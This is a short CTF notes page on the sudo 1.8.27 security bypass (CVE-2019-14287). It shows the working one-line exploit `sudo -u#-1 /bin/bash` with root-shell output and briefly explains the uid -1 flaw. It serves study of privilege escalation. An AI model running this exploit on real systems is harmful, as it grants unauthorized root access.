> For the complete documentation index, see [llms.txt](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/linux-priv/sudo/sudo-1.8.27-security-bypass.md).

# Sudo 1.8.27 Security Bypass

CVE 2019-14287

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

{% code overflow="wrap" %}

```bash
sudo -l

# User hacker may run the following commands on kali:
#    (ALL, !root) /bin/bash 

# Exploit 

sudo -u#-1 /bin/bash

# root@kali:/home/hacker# id
# uid=0(root) gid=1000(hacker) groups=1000(hacker)
# root@kali:/home/hacker#

# Description: 
# Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv 
# -u#-1 returns as 0 which is root's id
```

{% endcode %}
